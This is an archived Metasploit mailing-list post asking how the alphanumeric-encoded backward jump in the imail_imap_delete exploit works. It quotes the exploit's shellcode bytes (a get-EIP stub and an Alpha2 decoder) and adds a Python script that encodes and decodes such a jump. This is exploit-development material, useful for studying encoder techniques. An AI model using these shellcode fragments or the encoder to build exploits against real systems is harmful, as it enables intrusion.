Metasploit mailing list archives

imail_imap_delete exploit explanation


From: ramatkal at hotmail.com (sol seclists)
Date: Fri, 27 May 2005 01:19:38 +0200

Quick question about the imail_imap_delete exploit...

I'm trying to do a JMP -600 bytes encoded with alphanumeric characters, and I think spoonm did something very similar in the imail_imap_delete exploit...

the code in question is presented below:

  # get eip code: runs first so that the decoder below can use edx as its
  # base register (the "edx context" in the next comment)
  my $evil = '';   # declared here so the fragment stands alone
  $evil .=
    "\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x5a\x6a\x31\x59".
    "\x6b\x42\x34\x49\x30\x42\x4e\x42\x49\x75\x50\x4a\x4a\x52\x52\x59";
  # alphanum encoded jmp back (edx context): appended with .= rather than
  # assigned with =, otherwise the get-eip stub above would be discarded
  $evil .=
    "\x6a\x6a\x58\x30\x42\x31\x50\x41\x42\x6b\x42\x41".
    "\x7a\x42\x32\x42\x41\x32\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50".
    "\x75\x4a\x49\x52\x7a\x71\x4a\x4d\x51\x7a\x4a\x6c\x55\x66\x62\x57".
    "\x70\x55\x50\x4b\x4f\x6b\x52\x6a";


I'm just wondering if anybody knows how this was done and how it works?

Thanks very much,
RaMatkal
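An added example (not code from spoonm's exploit or from Metasploit) of the encoding the second block in the post relies on. The "jjX0B1PABkBAzB2BA2AA0AAX8BBPu" prefix in that block is Alpha2's mixed-case decoder stub for an edx base register; at run time it walks the alphanumeric bytes that follow it in pairs and rewrites each pair (a, b) in place as the single byte ((a & 0x0F) << 4) ^ b, then falls through into the decoded bytes. The script below builds the 5-byte `E9 rel32` for a jump 600 bytes back, encodes it under that pair rule so every output byte is in 0-9A-Za-z, and models the decoder to show the round trip. The displacement convention (measured from the start of the jmp, so rel32 = -600 - 5) and the first-match pair selection are my choices; the get-eip stub that must load edx with the decoder's address beforehand is not generated here.

```python
import struct

# Alphabet the encoded stream is allowed to use: 0-9, A-Z, a-z.
ALNUM = bytes(range(0x30, 0x3A)) + bytes(range(0x41, 0x5B)) + bytes(range(0x61, 0x7B))


def encode_byte(x, badchars=b""):
    """Encode one byte as an alphanumeric pair (a, b) with x == ((a & 0x0F) << 4) ^ b.

    b carries the low nibble of x unchanged; a's low nibble is chosen so that,
    shifted up and XORed with b's high nibble, it yields the high nibble of x.
    The first valid pair in alphabet order is returned (a real encoder picks one
    at random so the output has no fixed signature).
    """
    for b in ALNUM:
        if b in badchars or (b & 0x0F) != (x & 0x0F):
            continue
        want = (x >> 4) ^ (b >> 4)  # low nibble that a must have
        for a in ALNUM:
            if a not in badchars and (a & 0x0F) == want:
                return bytes((a, b))
    raise ValueError(f"no alphanumeric pair encodes byte {x:#04x} under the given badchars")


def encode(payload, badchars=b""):
    """Encode a byte string; the output is twice as long and entirely alphanumeric."""
    return b"".join(encode_byte(x, badchars) for x in payload)


def decode(encoded):
    """Model of the decoder stub: combine each pair back into the byte it encodes.
    In memory the stub does this relative to its base register (edx in the post)
    and writes the result over the pair, so the decoded code ends up in place."""
    if len(encoded) % 2:
        raise ValueError("encoded stream must consist of whole pairs")
    return bytes((((a & 0x0F) << 4) ^ b) & 0xFF
                 for a, b in zip(encoded[0::2], encoded[1::2]))


def jmp_rel32(displacement):
    """E9 rel32 jump. displacement is measured from the start of the jmp itself;
    rel32 is relative to the end of the 5-byte instruction, so landing N bytes
    before the jmp needs rel32 = -N - 5 (my convention, stated in the lead-in)."""
    return b"\xe9" + struct.pack("<i", displacement - 5)


def is_alphanumeric(data):
    return all(c in ALNUM for c in data)


if __name__ == "__main__":
    raw = jmp_rel32(-600)  # the "JMP -600 bytes" from the post
    enc = encode(raw)
    print(f"raw jmp : {raw.hex()}")  # e9a3fdffff
    print(f"encoded : {enc.decode()} ({len(enc)} bytes)")
    assert is_alphanumeric(enc) and decode(enc) == raw
```

Every byte value 0x00-0xFF has at least one such pair, because the alphanumerics cover all sixteen low nibbles with high nibbles 3 through 7; passing badchars narrows the choice and can make a byte unencodable, which the function reports instead of silently emitting a bad byte. The encoded jmp alone does nothing useful: the decoder prefix must sit directly in front of it and edx must already point at that prefix, which is the job of the "get eip" stub quoted first in the post.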

